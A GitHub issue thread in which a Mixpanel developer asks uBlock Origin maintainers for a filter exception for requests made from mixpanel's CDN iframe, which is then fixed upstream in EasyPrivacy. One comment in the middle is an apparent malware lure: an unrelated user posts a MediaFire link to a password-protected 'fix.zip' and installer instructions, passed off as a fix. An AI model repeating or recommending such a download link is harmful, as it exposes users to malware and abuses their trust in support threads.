### ISSUE TITLE
mixpanel.com: breakage

### ISSUE THREAD

**Issue by jakewski** [uBlockOrigin/uAssets#25106]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Search [here](https://github.com/uBlockOrigin/uAssets/issues) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL(s) where the issue occurs.

```yaml
https://mixpanel.com
```

### Description

Hey all, we have an issue with the mixpanel.com product where we embed an iframe from our CDN and requests get blocked from that iframe. I realize Mixpanel is popular for ad blocking, but there is a filter that allows our CDN assets to come in for the actual website:

https://github.com/uBlockOrigin/uAssets/blob/82ef7b1fe3e9c26ae01ad619e58226374e4fb688/thirdparties/easylist/easyprivacy.txt#L52606

Can we add another filter that allows CDN requests from the CDN domain as well?
```
@@||mxpnl.com^$domain=mxpnl.com
```

### Other extensions used

none

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

</details>

### Configuration

<details>
<summary>Details</summary>

```yaml
uBlock Origin: 1.59.0
Chromium: 128
filterset (summary):
 network: 154059
 cosmetic: 48053
 scriptlet: 22188
 html: 0
listset (total-discarded, last-updated):
 default:
  user-filters: 0-0, never
  ublock-filters: 39659-270, 1h.33m Δ
  ublock-badware: 10909-6, 1h.33m Δ
  ublock-privacy: 1088-2, 1h.33m Δ
  ublock-unbreak: 2469-0, 1h.33m Δ
  ublock-quick-fixes: 221-0, 1h.33m Δ
  easylist: 85713-568, 1h.33m Δ
  easyprivacy: 53073-647, 1h.33m Δ
  urlhaus-1: 29270-0, 15h.35m
  plowe-0: 3545-0, 15h.35m
filterset (user): [empty]
trustedset:
 added: [array of 1 redacted]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 834 ms
 maxAssetCacheWait: 17 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 16
 network:
  mxpnl.com: 3
  rollbar.com: 1
  sprig.com: 12

```
</details>

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by stephenhawk8054** [comment]
It's already fixed in EP:

![image](https://github.com/user-attachments/assets/5c09b8fc-74bf-46d9-91d4-3d5b944211c9)

https://github.com/easylist/easylist/blob/ed2b5ce64e8d2c27a6277fdc0e0a246d274fc05f/easyprivacy/easyprivacy_allowlist.txt#L209

**Comment by jakewski** [comment]
@stephenhawk8054 I know about the one for requests coming from `mixpanel.com`, we need to whitelist cdn requests coming from the cdn domain:

```
@@||mxpnl.com^$domain=mxpnl.com
```

**Comment by stephenhawk8054** [comment]
How can I reproduce the issue?

**Comment by jakewski** [comment]
It's a mixpanel feature for session replay where we embed an iframe from the CDN. The feature requires a special plan + authentication, but you can access the iframe here and see asset requests getting blocked https://cdn.mxpnl.com/static/asset-cache/1ca69745eeaba2e4e93aedce3097a8b8/compiled/replay-embed/index.html

**Comment by stephenhawk8054** [comment]
Fixed in https://github.com/easylist/easylist/commit/914b457208b8d97643cf8b74cbd889bf4441da09
